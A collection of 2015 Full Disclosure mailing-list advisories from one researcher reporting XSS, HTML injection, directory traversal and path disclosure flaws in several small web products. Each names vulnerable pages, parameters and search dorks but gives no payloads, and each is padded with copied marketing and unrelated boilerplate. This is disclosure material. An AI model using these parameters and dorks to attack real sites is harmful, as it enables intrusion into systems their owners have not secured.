http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple_8.html
https://progressive-comp.com/?a=139222176300014r=1w=1​
http://whitehatpost.blog.163.com/blog/static/242232054201548925221/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvmTabId=0Lang=en-USOU=0ItemId=44951
https://www.bugscan.net/#!/x/21160
http://bluereader.org/article/27452998







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing

[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web
Security Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple XSS Security
Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 07, 2015
Latest Update: May 07, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor  Product Description:*


*Vendor:*
MT.VERNON MEDIA



*Product  Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL  Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet  Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA Web-Design web application has a computer security bug
problem. It can be exploited by stored XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner,
experienced five code refactoring. It has redefined the concept of the
scanner provides sources for the latest info-sec news, tools, and
advisories. It also publishs suggestions, advisories, solutions details
related to XSS vulnerabilities.


*(2.1) *The first programming code flaw occurs at section.php? page with
id parameter.

*(2.2)* The second programming code flaw occurs at illustrated_verse.php?
page with id parameter.

*(2.3)* The third programming code flaw occurs at image.php? page with
id parameter.

*(2.4) *The forth programming code flaw occurs at gallery.php? page with
np parameter.







*References:*
http://www.tetraph.com/security/xss-vulnerability/mt-vernon-media-web-design-v1-12-multiple-xss/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-multiple-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-multiple-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154885036469
https://progressive-comp.com/?a=139222176300014r=1w=1​
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvmTabId=0Lang=en-USOU=0ItemId=44832
https://www.bugscan.net/#!/x/21289
http://bluereader.org/article/30765596






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS

[FD] MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 gallery.php? category
parameter HTML Injection Security Vulnerabilities
Product: Web-Design v1.12
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing[Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)



*Recommendation Details:*


*(1) Vendor  Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product  Vulnerable Versions:*
Web-Design
v1.12


*Vendor URL  Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet  Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored HTML Injection attacks. Hypertext Markup Language
(HTML) injection, also sometimes referred to as virtual defacement, is an
attack on a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user supplied
data, an attacker can supply valid HTML, typically via a parameter value,
and inject their own content into the page. This attack is typically used
in conjunction with some form of social engineering, as the attack is
exploiting a code-based vulnerability and a user's trust.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner,
experienced five code refactoring. It has redefined the concept of the
scanner provides sources for the latest info-sec news, tools, and
advisories. It also publishs suggestions, advisories, solutions details
related to HTML vulnerabilities.


*(2.1) *The first programming code flaw occurs at category parameter in
gallery.php? page.





*References:*
http://www.tetraph.com/security/html-injection/mt-vernon-media-web-design-v1-12-html-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-html.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-html-injection/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-html-injection/
http://whitehatpost.blog.163.com/blog/static/24223205420154893850881/
https://progressive-comp.com/?l=full-disclosurem=142907520526783w=2
https://www.bugscan.net/#!/x/21454
http://seclists.org/fulldisclosure/2015/Apr/37
http://lists.openwall.net/full-disclosure/2015/04/15/3




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities*


Exploit Title: Feed2JS v1.7 magpie_debug.php? url parameter XSS Security
Vulnerabilities
Product: Feed2JS
Vendor: feed2js.org
Vulnerable Versions: v1.7
Tested Version: v1.7
Advisory Publication: May 09, 2015
Latest Update: May 09, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Jing Wang [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)




*Proposition Details:*


*(1) Vendor  Product Description:*


*Vendor:*
feed2js.org


*Product  Vulnerable Versions:*
Feed2JS
v1.7


*Vendor URL  Download:*
Feed2JS can be downloaded from here,
https://feed2js.org/index.php?s=download


*Source code:*
http://www.gnu.org/licenses/gpl.html


*Product Introduction Overview:*
What is Feed to JavaScript? An RSS Feed is a dynamically generated
summary (in XML format) of information or news published on other web
sites- so when the published RSS changes, your web site will be
automatically changed too. It is a rather simple technology that allows
you, the humble web page designer, to have this content displayed in your
own web page, without having to know a lick about XML! Think of it as a box
you define on your web page that is able to update itself, whenever the
source of the information changes, your web page does too, without you
having to do a single thing to it. This Feed2JS web site (new and
improved!) provides you a free service that can do all the hard work for
you-- in 3 easy steps:
Find the RSS source, the web address for the feed.
Use our simple tool to build the JavaScript command that will display it
Optionally style it up to look pretty.

Please keep in mind that feeds are cached on our site for 60 minutes, so if
you add content to your RSS feed, the updates will take at least an hour to
appear in any other web site using Feed2JS to display that feed. To run
these scripts, you need a web server capable of running PHP which is rather
widely available (and free). You will need to FTP files to your server,
perhaps change permissions, and make some basic edits to configure it for
your system. I give you the code, getting it to work is on your shoulders.
I will try to help, but cannot always promise answers.




*(2) Vulnerability Details:*
Feed2JS web application has a computer security bug problem. It can be
exploited by stored XSS attacks. This may allow a remote attacker to create
a specially crafted request that would execute arbitrary script code in a
user's browser session within the trust relationship between their browser
and the server.

Several other Feed2JS products 0-day vulnerabilities have been found by
some other bug hunter researchers before. Feed2JS has patched some of them.
Openwall software releases and other related files are also available from
the Openwall file archive and its mirrors. You are encouraged to use the
mirrors, but be sure to verify the signatures on software you download. The
more experienced users and software developers may use our CVSweb server to
browse through the source code for most pieces of Openwall software along
with revision history information for each source file. We publish
articles, make presentations, and offer professional services. Openwall
has published suggestions, advisories, solutions details related to XSS
vulnerabilities.


*(2.1)* The first programming code flaw occurs at url parameter in
magpie_debug.php? page.





*References:*
http://www.tetraph.com/security/xss-vulnerability/feed2js-v1-7-xss/
http://securityrelated.blogspot.com/2015/05/feed2js-v17-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/feed2js-v1-7-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/feed2js-v1-7-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154810359682/
https://progressive-comp.com/?l=full-disclosurem=142907534026807w=2
https://www.bugscan.net/#!/x/21291
http://bluereader.org/article/27452996
http://lists.openwall.net/full-disclosure/2015/04/15/4




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] NetCat CMS 3.12 HTML Injection Security Vulnerabilities

2015-04-14 Thread Jing Wang
*NetCat CMS 3.12 HTML Injection Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 /catalog/search.php? q Parameter HTML
Injection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: April 15, 2015
Latest Update: April 15, 2015
Vulnerability Type: Improper Input Validation [CWE-20]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
NetCat


*Product  Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL  Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. NetCat designed to create an absolute
majority of the types of sites: from simple business card with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section.

Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000.





*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
HTML Injection attacks. Hypertext Markup Language (HTML) injection, also
sometimes referred to as virtual defacement, is an attack on a user made
possible by an injection vulnerability in a web application. When an
application does not properly handle user supplied data, an attacker can
supply valid HTML, typically via a parameter value, and inject their own
content into the page. This attack is typically used in conjunction with
some form of social engineering, as the attack is exploiting a code-based
vulnerability and a user's trust.

Several NetCat products 0-day vulnerabilities have been found by some other
bug hunter researchers before. NetCat has patched some of them. Web
Security Watch is an aggregator of security reports coming from various
sources. It aims to provide a single point of tracking for all publicly
disclosed security issues that matter. Its unique tagging system enables
you to see a relevant set of tags associated with each security alert for a
quick overview of the affected products. What's more, you can now subscribe
to an RSS feed containing the specific tags that you are interested in -
you will then only receive alerts related to those tags. It has published
suggestions, advisories, solutions details related to HTML vulnerabilities.

*(2.1) *The vulnerability occurs at catalog/search.php? page with q
parameter.





*References:*
http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-html-injection-security.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-html-injection-security-vulnerabilities/
http://www.irist.ir/author-Wang%20Jing.html
http://lists.openwall.net/full-disclosure/2015/03/02/5
http://www.websecuritywatch.com/multiple-http-response-splitting-crlf-xss-vulnerabilities-in-netcat-cms/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities

2015-04-14 Thread Jing Wang
*NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 Multiple Directory Traversal Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: April 14, 2015
Latest Update: April 14, 2015
Vulnerability Type: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal') [CWE-22]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Discovert and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]






*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
NetCat


*Product  Vulnerable Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL  Download:*
NetCat can be obtained from here,
http://netcat.ru/


*Product Introduction Overview:*
NetCat.ru is russian local company. NetCat designed to create an absolute
majority of the types of sites: from simple business card with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section.

Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000.




*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
Directory Traversal - Local File Include (LFI) attacks. A local file
inclusion (LFI) flaw is due to the script not properly sanitizing user
input, specifically path traversal style attacks (e.g. '../../') supplied
to the parameters. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote host . This
may allow disclosing file contents or executing files like PHP scripts.
Such attacks are limited due to the script only calling files already on
the target host.

Several other NetCat products 0-day vulnerabilities have been found by some
other bug hunter researchers before. NetCat has patched some of them. Gmane
(pronounced mane) is an e-mail to news gateway. It allows users to access
electronic mailing lists as if they were Usenet newsgroups, and also
through a variety of web interfaces. Gmane is an archive; it never expires
messages (unless explicitly requested by users). Gmane also supports
importing list postings made prior to a list's inclusion on the service. It
has published suggestions, advisories, solutions related to Directory
Traversal vulnerabilities.



*(2.1) *The first programming code flaw occurs at /netcat/index.php? page
with INCLUDE_FOLDER parameter.
.
*(2.2)* The second programming code flaw occurs at /eshop/index.php? page
with INCLUDE_FOLDER parameter.

*(2.3)* The third programming code flaw occurs at /add.php? page with
INCLUDE_FOLDER parameter.





References:
http://www.tetraph.com/security/directory-traversal-vulnerability/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-multiple-directory.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://www.iedb.ir/author-Wang%20Jing.html
http://exploitarchive.com/724cms-5-01-4-59-4-01-3-01-directory-traversal/
http://lists.openwall.net/full-disclosure/2015/03/05/5
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1666



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities

2015-04-05 Thread Jing Wang
*ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: ECE Projects XSS (Cross-site Scripting) Security
Vulnerabilities
Vendor: ECE Projektmanagement G.m.b.H.  Co. KG (ECE)
Product: ECE Projects
Vulnerable Versions:
Tested Version:
Advisory Publication: April 01, 2015
Latest Update: April 01, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]




*Suggestion Details:*


*(1) Vendor  Product Description:*


*Vendor:*
ECE Projektmanagement G.m.b.H.  Co. KG (ECE)


*Product  Version:*
All Projects - Shopping  Office, Traffic, Industries, Hotel, Residential


*Vendor URL  download:*
ECE Projects can be obtained from here,
http://www.ece.com/en/projects/all-projects/


*Google Dork:*
ECE Projektmanagement GmbH  Co. KG


*Product Introduction Overview:*
ECE develops, builds, and manages large commercial properties in the
business areas Shopping, Office, Traffic, and Industries. It was founded in
1965 by mail-order pioneer Prof. Werner Otto (1909-2011) and is owned by
the Otto family. Since 2000, the company founder's son, Alexander Otto, has
been heading the company. Hamburg-based ECE has been developing, building,
leasing out, and managing large commercial properties in the business areas
Shopping, Office, Traffic, and Industries and is European market leader in
the field of downtown shopping centers. For decades, ECE has been realizing
very successfully large group headquarters, office buildings, industrial
buildings, logistic centers, traffic-related properties, hotels and other
highly complex building types. ECE provides all real estate-related
services from one source and thus creates a major benefit for their
customers, clients and partners by pooling their complete know-how. With
regard to numerous projects the ECE group acts as investor and keeps the
projects in the portfolio for decades. Furthermore, two ECE funds
concentrate on the acquisition of shopping centers with value growth
potential. ECE is Europe-wide successfully positioned with numerous
subsidiaries and joint ventures.

ECE employs specialists with in-depth knowledge of the retail trade and
all related disciplines and pools this wide-ranging expertise under one
roof. Our full-service concept extends from the original idea right through
to long-term management. Our credo: a full range of services from a single
provider who takes overall responsibility as opposed to a coordinator.
This expertise is underpinned by several decades of experience in the
sector as well as the financial strength of the ECE Group and enables us to
cater to the full range of needs and requirements of our clients.



*(2) Vulnerability Details:*
ECE web application has a security bug problem. It can be exploited by XSS
attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several ECE Projects products 0Day vulnerabilities have been found by some
other bug hunter researchers before. ECE Projects patched some of them.
Open Sourced Vulnerability Database (OSVDB) is an independent and
open-sourced database. The goal of the project is to provide accurate,
detailed, current, and unbiased technical information on security
vulnerabilities. The project promotes greater, open collaboration between
companies and individuals. It has published suggestions, advisories,
solutions details related to XSS vulnerabilities.


*(2.1)* The first code programming flaw occurs atoccurs at suchergebnis/?
page with tx_solr[q] parameter.






*References:*
http://www.tetraph.com/security/xss-vulnerability/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/ece-projects-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014r=1w=2
http://packetstormsecurity.com/files/authors/11717
http://www.osvdb.org/show/osvdb/119707




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: 

[FD] 6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities

2015-04-05 Thread Jing Wang
*6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: 6kbbs XSS (Cross-site Scripting) Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: April 02, 2015
Latest Update: April 02, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor  Product Description:*


*Vendor:*
6kbbs



*Product  Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL  download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html
http://code.google.com/p/6kbbs/downloads/list



*Product Introduction Overview:*
6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions.

1, using XHTML + CSS architecture, so that the structure of the page,
saving transmission static page code, but also easy to modify the
interface, more in line with WEB standards; 2, the Forum adopted Cookies,
Session, Application and other technical data cache on the forum, reducing
access to the database to improve the performance of the Forum. Can carry
more users simultaneously access; 3, the data points table function, reduce
the burden on the amount of data when accessing the database; 4, support
for multi-skin style switching function; 5, the use of RSS technology to
support subscriptions forum posts, recent posts, user's posts; 6, the
display frame mode + tablet mode, the user can choose according to their
own preferences to; 7. forum page optimization keyword search, so the forum
more easily indexed by search engines; 8, extension, for our friends to
provide a forum for a broad expansion of space services; 9, webmasters can
add different top and bottom of the ad, depending on the layout; 10, post
using HTML + UBB way the two editors, mutual conversion, compatible with
each other; ...




*(2) Vulnerability Details:*
6kbbs web application has a security bug problem. It can be exploited by
XSS attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several 6kbbs products 0-day vulnerabilities have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. The
milw00rm.com is archive of exploits, videos, papers and vulnerabilities. It
has published suggestions, advisories, solutions details related to 6kbbs
vulnerabilities.


*(2.1)* The first code programming flaw occurs atoccurs at /userlist.php?
page with orderby parameter.





*References:*
http://www.tetraph.com/security/xss-vulnerability/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.sg/2015/04/6kbbs-v80-xss-cross-site-scripting.html?view=sidebar
http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://marc.info/?a=139222176300014r=1w=4
http://packetstormsecurity.com/files/authors/11717
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01759.html
http://milw00rm.com/exploits/6673




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] 724CMS 5.01 Multiple Information Leakage Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Multiple Information Leakage Security Vulnerabilities*



Exploit Title: 724CMS Multiple Information Leakage Security Vulnerabilities

Vendor: 724CMS

Product: 724CMS

Vulnerable Versions: 3.01   4.01   4.59   5.01

Tested Version: 5.01

Advisory Publication: March 14, 2015

Latest Update: March 14, 2015

Vulnerability Type: Information Exposure [CWE-200]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 10.0

Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Suggestion Details:*



*(1) Vendor  Product Description:*



*Vendor:*

724CMS Enterprise




*Product  Vulnerable Versions:*

724CMS

3.01

4.01

4.59

5.01






*Vendor URL  download:*

724CMS can be got from here,

http://724cms.com/




*Product Introduction Overview:*

724CMS is a content management system (CMS) that has large customers spread
in Canada, Japan, Korean, the United States and many others. It allows
publishing, editing and modifying content, organizing, deleting as well as
maintenance from a central interface. Meanwhile, 724CMS provides procedures
to manage workflow in a collaborative environment.







*(2) Vulnerability Details:*

724CMS web application has a security bug problem. It can be exploited by
information leakage attacks - Full Path Disclosure (FPD). This may allow a
remote attacker to disclose the software's installation path. While such
information is relatively low risk, it is often useful in carrying out
additional, more focused attacks.


Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. NVD is the U.S.
government repository of standards based vulnerability management data
(This data enables automation of vulnerability management, security
measurement, and compliance (e.g. FISMA)). It has published suggestions,
advisories, solutions related to 724CMS vulnerabilities.



*(2.1)* The first code programming flaw occurs at index.php page with
Lang, ID parameters.


*(2.2)* The second code programming flaw occurs at section.php page with
Lang, ID parameters.








*References:*

http://tetraph.com/security/information-leakage-vulnerability/724cms-5-01-information-leakage-security-vulnerabilities/

http://securityrelated.blogspot.com/2015/03/724cms-501-information-leakage-security.html

http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-information-leakage-security-vulnerabilities/

